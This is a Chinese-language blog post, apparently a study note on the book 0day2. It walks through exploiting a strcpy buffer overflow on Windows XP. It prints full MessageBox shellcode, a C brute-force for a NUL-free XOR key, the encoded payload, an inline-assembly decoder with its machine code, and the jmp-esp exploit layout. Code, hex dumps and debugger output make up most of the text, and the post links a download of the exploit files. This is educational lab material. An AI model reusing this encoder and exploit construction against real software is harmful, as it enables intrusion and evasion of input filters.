旧书重温:0day2【5】shellcode变形记

紧接上一篇,结合第一篇

//这篇文章主要成功溢出一个带有缓冲区溢出的小程序,其中我们的shellcode被strcpy截断了所以我们需要变形shellcode,这个实验中也出现了很多意想不到的拦路虎,但是我们巧妙的避开了

我通过vc++6.0 调试模式下下的disassemly窗口获取到了机器码

\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\x0C\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C\x57\x56\x8B\x69\x08\x8B\x79\x20\x8B\x09\x66\x39\x57\x18\x75\xF2\x5E\x5F\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB\x53\x68\x61\x61\x61\x61\x68\x62\x62\x62\x62\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8

 

 

但是我们直接结合第一篇文章,做实验的话,此代码会被截断的.因为有0开头的字节,od调试证明FC686A0A,就是开头处,0A处被截断了,所以我没不得不学习 “对shellcode编码”的技术。

shellcode变形就是先用简单的运算把shellcode变的他娘也不认识他以后(其实主要解决一问题,我们才会使用变形记的,就咱这个字符串含有0的问题,必须把它的零去掉)

再在变形后的shellcode前边放上,我们的解码部分,当EIP进入我们的代码后,解码部分先还原我们的shellcode,再把控制权EIP给我们的shellcode。

 

0day2 第三章中的《会变形的shellcode》》(p99)中

编码运算用的异或

key 0x44

 

但是0day2里的实验过于简单,对于我们来说,我们得解决字符串截断的问题:

 1     int ishellcodelen = sizeof(shellcode);
 2     xorshellcode = new  char[ishellcodelen + 2];
 3     memset(xorshellcode,0x00,ishellcodelen+2);
 4     cpy = new  char[ishellcodelen + 2];
 5     memset(cpy,0x00,ishellcodelen+2);
 6     //printf(" %d = %d \r\n",ishellcodelen,strlen((const char *)shellcode));
 7     int i =0;
 8 /*    
 9     for(int j =0;j < 0xff;j++)
10     {
11 
12         for(i =0;i < ishellcodelen;i++)
13         {
14             xorshellcode[i] = shellcode[i] ^ j;
15 
16         
17             
18         }
19         strcpy(cpy,xorshellcode);
20         if(strlen(cpy) == strlen(xorshellcode))
21         {
22             printf("cpy is %d , xor is %d ",strlen(cpy),strlen(xorshellcode));
23             printf("%x \r\n",j);
24         }
25     }
26     */
27 
28     /*
29     for( i =0;i < ishellcodelen;i++)
30     {
31         printf("0x%0.2x ",xorshellcode[i]);
32         
33     }
34     
35     printf("\r\n %d = %d \r\n",ishellcodelen,strlen((const char *)xorshellcode));
36     */
37     
38         for(i =0;i < ishellcodelen;i++)
39         {
40             xorshellcode[i] = shellcode[i] ^ 0xCE;    
41         }
42     FILE * fp;
43 
44     if(!(fp=fopen("password2.txt","w+")))
45     {
46         printf("fp fopen flaid \n");
47         int e = GetLastError();
48         exit(0);
49     }
50     //int l = fputs((const char *)&(xorshellcode[0]),fp);
51     int l = fwrite(xorshellcode,strlen(xorshellcode),sizeof( char),fp);
52     printf("fp write byte %d \n",l);
53     l = GetLastError();
54     fclose(fp);/**/

 

结果

cpy is 181 , xor is 181 0
cpy is 182 , xor is 182 1
cpy is 182 , xor is 182 2
cpy is 89 , xor is 89 3
cpy is 24 , xor is 24 4
cpy is 75 , xor is 75 5
cpy is 107 , xor is 107 6
cpy is 114 , xor is 114 7
cpy is 54 , xor is 54 8
cpy is 59 , xor is 59 9
cpy is 3 , xor is 3 a
cpy is 182 , xor is 182 b
cpy is 15 , xor is 15 c
cpy is 182 , xor is 182 d
cpy is 182 , xor is 182 e
cpy is 105 , xor is 105 f
cpy is 182 , xor is 182 10
cpy is 182 , xor is 182 11
cpy is 182 , xor is 182 12
cpy is 182 , xor is 182 13
cpy is 182 , xor is 182 14
cpy is 182 , xor is 182 15
cpy is 182 , xor is 182 16
cpy is 182 , xor is 182 17
cpy is 63 , xor is 63 18
cpy is 182 , xor is 182 19
cpy is 182 , xor is 182 1a
cpy is 182 , xor is 182 1b
cpy is 49 , xor is 49 1c
cpy is 182 , xor is 182 1d
cpy is 5 , xor is 5 1e
cpy is 182 , xor is 182 1f
cpy is 57 , xor is 57 20
cpy is 182 , xor is 182 21
cpy is 182 , xor is 182 22
cpy is 182 , xor is 182 23
cpy is 122 , xor is 122 24
cpy is 182 , xor is 182 25
cpy is 182 , xor is 182 26
cpy is 182 , xor is 182 27
cpy is 182 , xor is 182 28
cpy is 182 , xor is 182 29
cpy is 182 , xor is 182 2a
cpy is 25 , xor is 25 2b
cpy is 141 , xor is 141 2c
cpy is 182 , xor is 182 2d
cpy is 182 , xor is 182 2e
cpy is 182 , xor is 182 2f
cpy is 43 , xor is 43 30
cpy is 182 , xor is 182 31
cpy is 12 , xor is 12 32
cpy is 21 , xor is 21 33
cpy is 100 , xor is 100 34
cpy is 182 , xor is 182 35
cpy is 182 , xor is 182 36
cpy is 182 , xor is 182 37
cpy is 4 , xor is 4 38
cpy is 61 , xor is 61 39
cpy is 108 , xor is 108 3a
cpy is 120 , xor is 120 3b
cpy is 84 , xor is 84 3c
cpy is 69 , xor is 69 3d
cpy is 182 , xor is 182 3e
cpy is 182 , xor is 182 3f
cpy is 182 , xor is 182 40
cpy is 182 , xor is 182 41
cpy is 182 , xor is 182 42
cpy is 182 , xor is 182 43
cpy is 182 , xor is 182 44
cpy is 83 , xor is 83 45
cpy is 117 , xor is 117 46
cpy is 98 , xor is 98 47
cpy is 182 , xor is 182 48
cpy is 48 , xor is 48 49
cpy is 182 , xor is 182 4a
cpy is 45 , xor is 45 4b
cpy is 86 , xor is 86 4c
cpy is 182 , xor is 182 4d
cpy is 182 , xor is 182 4e
cpy is 10 , xor is 10 4f
cpy is 171 , xor is 171 50
cpy is 182 , xor is 182 51
cpy is 182 , xor is 182 52
cpy is 31 , xor is 31 53
cpy is 37 , xor is 37 54
cpy is 182 , xor is 182 55
cpy is 51 , xor is 51 56
cpy is 50 , xor is 50 57
cpy is 182 , xor is 182 58
cpy is 92 , xor is 92 59
cpy is 42 , xor is 42 5a
cpy is 182 , xor is 182 5b
cpy is 182 , xor is 182 5c
cpy is 182 , xor is 182 5d
cpy is 66 , xor is 66 5e
cpy is 67 , xor is 67 5f
cpy is 81 , xor is 81 60
cpy is 147 , xor is 147 61
cpy is 164 , xor is 164 62
cpy is 7 , xor is 7 63
cpy is 40 , xor is 40 64
cpy is 35 , xor is 35 65
cpy is 27 , xor is 27 66
cpy is 182 , xor is 182 67
cpy is 1 , xor is 1 68
cpy is 53 , xor is 53 69
cpy is 2 , xor is 2 6a
cpy is 182 , xor is 182 6b
cpy is 182 , xor is 182 6c
cpy is 182 , xor is 182 6d
cpy is 182 , xor is 182 6e
cpy is 182 , xor is 182 6f
cpy is 182 , xor is 182 70
cpy is 182 , xor is 182 71
cpy is 36 , xor is 36 72
cpy is 34 , xor is 34 73
cpy is 13 , xor is 13 74
cpy is 33 , xor is 33 75
cpy is 182 , xor is 182 76
cpy is 182 , xor is 182 77
cpy is 88 , xor is 88 78
cpy is 56 , xor is 56 79
cpy is 182 , xor is 182 7a
cpy is 134 , xor is 134 7b
cpy is 182 , xor is 182 7c
cpy is 182 , xor is 182 7d
cpy is 19 , xor is 19 7e
cpy is 182 , xor is 182 7f
cpy is 182 , xor is 182 80
cpy is 182 , xor is 182 81
cpy is 182 , xor is 182 82
cpy is 182 , xor is 182 83
cpy is 182 , xor is 182 84
cpy is 182 , xor is 182 85
cpy is 182 , xor is 182 86
cpy is 182 , xor is 182 87
cpy is 182 , xor is 182 88
cpy is 8 , xor is 8 89
cpy is 182 , xor is 182 8a
cpy is 16 , xor is 16 8b
cpy is 182 , xor is 182 8c
cpy is 18 , xor is 18 8d
cpy is 182 , xor is 182 8e
cpy is 182 , xor is 182 8f
cpy is 182 , xor is 182 90
cpy is 14 , xor is 14 91
cpy is 182 , xor is 182 92
cpy is 182 , xor is 182 93
cpy is 182 , xor is 182 94
cpy is 76 , xor is 76 95
cpy is 182 , xor is 182 96
cpy is 182 , xor is 182 97
cpy is 182 , xor is 182 98
cpy is 104 , xor is 104 99
cpy is 182 , xor is 182 9a
cpy is 182 , xor is 182 9b
cpy is 182 , xor is 182 9c
cpy is 182 , xor is 182 9d
cpy is 182 , xor is 182 9e
cpy is 182 , xor is 182 9f
cpy is 182 , xor is 182 a0
cpy is 182 , xor is 182 a1
cpy is 182 , xor is 182 a2
cpy is 182 , xor is 182 a3
cpy is 182 , xor is 182 a4
cpy is 182 , xor is 182 a5
cpy is 182 , xor is 182 a6
cpy is 182 , xor is 182 a7
cpy is 182 , xor is 182 a8
cpy is 154 , xor is 154 a9
cpy is 182 , xor is 182 aa
cpy is 145 , xor is 145 ab
cpy is 182 , xor is 182 ac
cpy is 68 , xor is 68 ad
cpy is 182 , xor is 182 ae
cpy is 182 , xor is 182 af
cpy is 182 , xor is 182 b0
cpy is 182 , xor is 182 b1
cpy is 182 , xor is 182 b2
cpy is 182 , xor is 182 b3
cpy is 182 , xor is 182 b4
cpy is 182 , xor is 182 b5
cpy is 182 , xor is 182 b6
cpy is 23 , xor is 23 b7
cpy is 182 , xor is 182 b8
cpy is 182 , xor is 182 b9
cpy is 182 , xor is 182 ba
cpy is 28 , xor is 28 bb
cpy is 182 , xor is 182 bc
cpy is 182 , xor is 182 bd
cpy is 106 , xor is 106 be
cpy is 182 , xor is 182 bf
cpy is 182 , xor is 182 c0
cpy is 112 , xor is 112 c1
cpy is 182 , xor is 182 c2
cpy is 182 , xor is 182 c3
cpy is 109 , xor is 109 c4
cpy is 182 , xor is 182 c5
cpy is 182 , xor is 182 c6
cpy is 182 , xor is 182 c7
cpy is 182 , xor is 182 c8
cpy is 182 , xor is 182 c9
cpy is 113 , xor is 113 ca
cpy is 182 , xor is 182 cb
cpy is 182 , xor is 182 cc
cpy is 90 , xor is 90 cd
cpy is 182 , xor is 182 ce
cpy is 182 , xor is 182 cf
cpy is 116 , xor is 116 d0
cpy is 9 , xor is 9 d1
cpy is 39 , xor is 39 d2
cpy is 182 , xor is 182 d3
cpy is 182 , xor is 182 d4
cpy is 182 , xor is 182 d5
cpy is 182 , xor is 182 d6
cpy is 182 , xor is 182 d7
cpy is 182 , xor is 182 d8
cpy is 182 , xor is 182 d9
cpy is 182 , xor is 182 da
cpy is 22 , xor is 22 db
cpy is 182 , xor is 182 dc
cpy is 95 , xor is 95 dd
cpy is 182 , xor is 182 de
cpy is 182 , xor is 182 df
cpy is 182 , xor is 182 e0
cpy is 182 , xor is 182 e1
cpy is 182 , xor is 182 e2
cpy is 26 , xor is 26 e3
cpy is 125 , xor is 125 e4
cpy is 182 , xor is 182 e5
cpy is 182 , xor is 182 e6
cpy is 182 , xor is 182 e7
cpy is 182 , xor is 182 e8
cpy is 182 , xor is 182 e9
cpy is 182 , xor is 182 ea
cpy is 118 , xor is 118 eb
cpy is 182 , xor is 182 ec
cpy is 182 , xor is 182 ed
cpy is 182 , xor is 182 ee
cpy is 182 , xor is 182 ef
cpy is 182 , xor is 182 f0
cpy is 119 , xor is 119 f1
cpy is 65 , xor is 65 f2
cpy is 182 , xor is 182 f3
cpy is 17 , xor is 17 f4
cpy is 103 , xor is 103 f5
cpy is 182 , xor is 182 f6
cpy is 182 , xor is 182 f7
cpy is 79 , xor is 79 f8
cpy is 182 , xor is 182 f9
cpy is 182 , xor is 182 fa
cpy is 182 , xor is 182 fb
cpy is 0 , xor is 0 fc
cpy is 182 , xor is 182 fd
cpy is 182 , xor is 182 fe
fp write byte 1
Press any key to continue

再结合od动态观察 0xCE解决了我们的问题!

 1 0012FB23        32 A6 A4 C4 F6 D0 A6 AD 47 1F 81 A6 FC BA    2Δ啮笑璆仸
 2 0012FB33  5F C2 45 3A 43 B0 C2 FD 15 79 CA E5 2D A8 75 FD  _翬:C奥?y叔-╱?
 3 0012FB43  FC 9D A6 BB BD AB BC 9A FD 1C AA 45 94 FE 45 85  鼭将細?狤旫E?
 4 0012FB53  C2 45 87 D2 99 98 45 A7 C6 45 B7 EE 45 C7 A8 F7  翬囈櫂EE奉E迁?
 5 0012FB63  99 D6 BB 3C 90 91 63 F3 A4 C4 F6 D0 BB CB 5B 31  欀?悜c螭啮谢薣1
 6 0012FB73  99 36 5B AE 45 8B F2 45 82 CB B6 CD 03 45 97 EE  ?[瓻嬺E偹锻E楊
 7 0012FB83  CD 13 FD 31 89 45 FA 75 CD 3B 57 C1 70 C8 F4 00  ??塃鷘?W羛若.
 8 0012FB93  A4 C4 F6 D0 A6 AD 47 1F 81 A6 FC BA 5F C2 45 3A  つ鲂ΝG仸_翬:
 9 0012FBA3  43 B0 C2 FD 15 79 CA E5 2D A8 75 FD FC 9D A6 BB  C奥?y叔-╱潶?
10 0012FBB3  BD AB BC 9A FD 1C AA 45 94 FE 45 85 C2 45 87 D2  将細?狤旫E吢E囈
11 0012FBC3  99 98 45 A7 C6 45 B7 EE 45 C7 A8 F7 99 D6 BB 3C  櫂EE奉E迁鳈只<
12 0012FBD3  90 91 63 F3 A4 C4 F6 D0 BB CB 5B 31 99 36        悜c螭啮谢薣1?

对照winhex导出的hex

\x32\xA6\xA4\xC4\xF6\xD0\xA6\xAD\x47\x1F\x81\xA6\xFC\xBA\x5F\xC2\x45\x3A\x43\xB0\xC2\xFD\x15\x79\xCA\xE5\x2D\xA8\x75\xFD\xFC\x9D\xA6\xBB\xBD\xAB\xBC\x9A\xFD\x1C\xAA\x45\x94\xFE\x45\x85\xC2\x45\x87\xD2\x99\x98\x45\xA7\xC6\x45\xB7\xEE\x45\xC7\xA8\xF7\x99\xD6\xBB\x3C\x90\x91\x63\xF3\xA4\xC4\xF6\xD0\xBB\xCB\x5B\x31\x99\x36\x5B\xAE\x45\x8B\xF2\x45\x82\xCB\xB6\xCD\x03\x45\x97\xEE\xCD\x13\xFD\x31\x89\x45\xFA\x75\xCD\x3B\x57\xC1\x70\xC8\xF4\x0D\x0A\xBA\xC6\x0F\x04\xC9\xCD\x1E\x88\x25\x3F\xF5\x9A\xEA\xD2\xBB\x2A\x45\x97\xEA\xCD\x13\xA8\x45\xF2\xB5\x45\x97\xD2\xCD\x13\xCD\xE2\x75\x5B\x91\x65\x99\xAF\xF3\xA4\xC4\xF6\xD0\xBB\x67\xFD\x15\x9D\xA6\xAF\xAF\xAF\xAF\xA6\xAC\xAC\xAC\xAC\x45\x0D\x0A\x9D\x9E\x9E\x9D\x31\x99\x32\x9D\x31\x99\x36

原以为解决问题了对照发现从红线处到结尾倒数第四个处都被改动了 万恶的代码! 还得继续搞!

再不行就在空间里搜索shellcode,执行。

功夫不亏有心人,我又试了几个数据,发现 key AE 解决问题了 呵呵

od堆栈里的数据

 1 0012FB28  52 C6 C4 A4 96 B0 C6 CD 27 7F E1 C6 9C DA 3F A2  R颇捌?崞溭??
 2 0012FB38  25 5A 23 D0 A2 9D 75 19 AA 85 4D C8 15 9D 9C FD  %Z#孝漸獏M?潨?
 3 0012FB48  C6 DB DD CB DC FA 9D 7C CA 25 F4 9E 25 E5 A2 25  欺菟茭潀?魹%澧%
 4 0012FB58  E7 B2 F9 F8 25 C7 A6 25 D7 8E 25 A7 C8 97 F9 B6  绮%铅%讕%楖?
 5 0012FB68  DB 5C F0 F1 03 93 C4 A4 96 B0 DB AB 3B 51 F9 56  踈瘃撃佰?Q鵙
 6 0012FB78  3B CE 25 EB 92 25 E2 AB D6 AD 63 25 F7 8E AD 73  ;?霋%猥汁c%鲙璼
 7 0012FB88  9D 51 E9 25 9A 15 AD 5B 37 A1 10 A8 94 6A DA A6  漄??璠7?〝j讦
 8 0012FB98  6F 64 A9 AD 7E E8 45 5F 95 FA 8A B2 DB 4A 25 F7  od┉~鐴_曻姴跩%?
 9 0012FBA8  8A AD 73 C8 25 92 D5 25 F7 B2 AD 73 AD 82 15 3B  姯s?捳%鞑璼瓊;
10 0012FBB8  F1 05 F9 CF 93 C4 A4 96 B0 DB 07 9D 75 FD C6 CF  ?撃佰漸?
11 0012FBC8  CF CF CF C6 CC CC CC CC 25 6A FD FE FE FD 51 F9  舷掀烫烫%jQ?
12 0012FBD8  52 FD 51 F9 56 00 DB AB 3B 51 F9 56 3B CE 25 EB  R齉鵙.郢;Q鵙;??
13 0012FBE8  92 25 E2 AB D6 AD 63 25 F7 8E AD 73 9D 51 E9 25  ?猥汁c%鲙璼漄?
14 0012FBF8  9A 15 AD 5B 37 A1 10 A8 94 6A DA A6 6F 64 A9 AD  ?璠7?〝j讦od┉
15 0012FC08  7E E8 45 5F 95 FA 8A B2 DB 4A 25 F7 8A AD 73 C8  ~鐴_曻姴跩%鲓璼?
16 0012FC18  25 92 D5 25 F7 B2 AD 73 AD 82 15 3B F1 05 F9 CF  %捳%鞑璼瓊;?
17 0012FC28  93 C4 A4 96 B0 DB 07 9D 75 FD C6 CF CF CF CF C6  撃佰漸舷舷?
18 0012FC38  CC CC CC CC 25 6A FD FE FE FD 51 F9 52 FD 51 F9  烫烫%jQ鵕齉?
19 0012FC48  56                                               V

粉色部分为重复的数据,我也不仔细对照了。 key AE,长度181字节+00结尾 = 182

那我们来学习下解码部分,参考0day2(p101)处的代码

 1 #include "stdafx.h"
 2 #include <stdio.h>
 3 #include <stdlib.h>
 4 #include <windows.h>
 5 // AE xor 后的代码
 6 char xorshellcode[] ={"\x52\xC6\xC4\xA4\x96\xB0\xC6\xCD\x27\x7F\xE1\xC6\x9C\xDA\x3F\xA2\x25\x5A\x23\xD0\xA2\x9D\x75\x19\xAA\x85\x4D\xC8\x15\x9D\x9C\xFD\xC6\xDB\xDD\xCB\xDC\xFA\x9D\x7C\xCA\x25\xF4\x9E\x25\xE5\xA2\x25\xE7\xB2\xF9\xF8\x25\xC7\xA6\x25\xD7\x8E\x25\xA7\xC8\x97\xF9\xB6\xDB\x5C\xF0\xF1\x03\x93\xC4\xA4\x96\xB0\xDB\xAB\x3B\x51\xF9\x56\x3B\xCE\x25\xEB\x92\x25\xE2\xAB\xD6\xAD\x63\x25\xF7\x8E\xAD\x73\x9D\x51\xE9\x25\x9A\x15\xAD\x5B\x37\xA1\x10\xA8\x94\x6A\xDA\xA6\x6F\x64\xA9\xAD\x7E\xE8\x45\x5F\x95\xFA\x8A\xB2\xDB\x4A\x25\xF7\x8A\xAD\x73\xC8\x25\x92\xD5\x25\xF7\xB2\xAD\x73\xAD\x82\x15\x3B\xF1\x05\xF9\xCF\x93\xC4\xA4\x96\xB0\xDB\x07\x9D\x75\xFD\xC6\xCF\xCF\xCF\xCF\xC6\xCC\xCC\xCC\xCC\x25\x6A\xFD\xFE\xFE\xFD\x51\xF9\x52\xFD\x51\xF9\x56"};
 7 
 8 void decode()
 9 {
10     DWORD p = (DWORD)xorshellcode;
11     _asm{
12         mov eax,p       //eax = xorshellcode起始位置
13         xor ecx,ecx
14 decode_loop:
15         mov bl,[eax+ecx]
16         xor bl,0xAE      //key AE
17         mov [eax+ecx],bl
18         inc eax
19         cmp bl,0x00      //字符串的结尾00 
20         jne    decode_loop
21     }
22 void (*pfun)(void);
23 pfun =(void(* )(void))&xorshellcode[0];
24 pfun();
25 }
26 int main(int argc, char* argv[])
27 {
28     decode();
29     return 0;
30 }

 执行效果ok ,验证说明此解码汇编OK

下一步呀,我们得简单修改下,结合0day2(p101)代码

代码下的提示说 eax是指向 shellcode的起始地址;我们如何获得这个地址呢?我参考了老罗那里的知识

 call zhenw0        // push eip ,jmp zhenw0

zhenw0:

    pop eax            // eax = eip = offset call zhenw0 处的内存地址

据老罗说这是病毒惯用手法

现在eax还得已经接近shellcode的地址了,还需要微调下,具体得od动态跟踪可知

卧槽,我发现,老罗的办法在咱们这里失效了,call zhenw0   会出现大量00 ,看来这个办法不行

_asm{
        call zhenw0
       
zhenw0:
        pop eax
        add eax,0x15
        xor ecx,ecx

decode_loop:
        mov bl,[eax+ecx]
        xor bl,0xAE
        mov [eax+ecx],bl
        inc eax
        cmp bl,0x00
        jne    decode_loop

shellcode:                //用nop代替shellcode,
        nop
        nop
        nop
        nop
    }

,我还有个其他办法:就是实验一用的jmp esp (7ffa4512),其后紧接咱们的shellcode其实 ,esp此时就指向我们的 decoder + shellcode ;所以mov eax,esp

在 add eax ,0x??就可以了

那么接着上面的想法继续

最后的解码部分的汇编代码为

void getshellcodeoffset()
{
    _asm{
        
        
        mov eax,esp
        add eax,0x16
        xor ecx,ecx

decode_loop:
        mov bl,[eax+ecx]
        xor bl,0xAE
        mov [eax+ecx],bl
        inc ecx
        cmp bl,0xEE            //结尾处要添加EE,最为结尾标志
        jne    decode_loop

shellcode:                //用nop代替shellcode,
        nop
        nop
        nop
        nop
    }

}

其对应的机器码是

1 \x8B\xC4\x83\xC0\x16\x33\xC9\x8A\x1C\x08\x80\xF3\xAE\x88\x1C\x08\x41\x80\xFB\xEE\x75\xF1 //这是decoder部分的机器码

其整个文件的结构是   abcdef...+jmp esp(控制EIP)+decoder +xor_shellcode 

jmp esp 控制EIP 向后跳 来到decoder处,decoder循环解码xor_shellcode解码完毕,继续向后走,进入shellcode的控制范围,弹出msg

下图是解码前后的od真相图

 

上图为 解码前的图 其中12Fb3aA处的代码就是xor_shellcode的代码 为 52c6......

上图为 解码后图 12FB3A处已经被还原好了。。。。变为了FC68........此时已经执行到了 12FB3A处,就是shellcode的空间内,继续走下去就 MSG了!

 

源代码和生成的exe 已经 password2.txt 文件我都打包了 http://pan.baidu.com/s/1pHE7p

其中测试环境xp sp2 vc++6.0  使用的jmp esp(7ffa4512lion提供的那个) 控制EIP,win7下需要自行查找jmp esp,自行修改1245FA7F

 

 

----------------------------------------------------

| QQ252738331

| Q群: 104132152(群名称是缓冲区溢出|汇编|逆向)

| 微博: http://t.qq.com/zhenw0

----------------------------------------------------

posted @ 2013-12-12 14:22  zhenw0  Views(1636)  Comments(0Edit  收藏  举报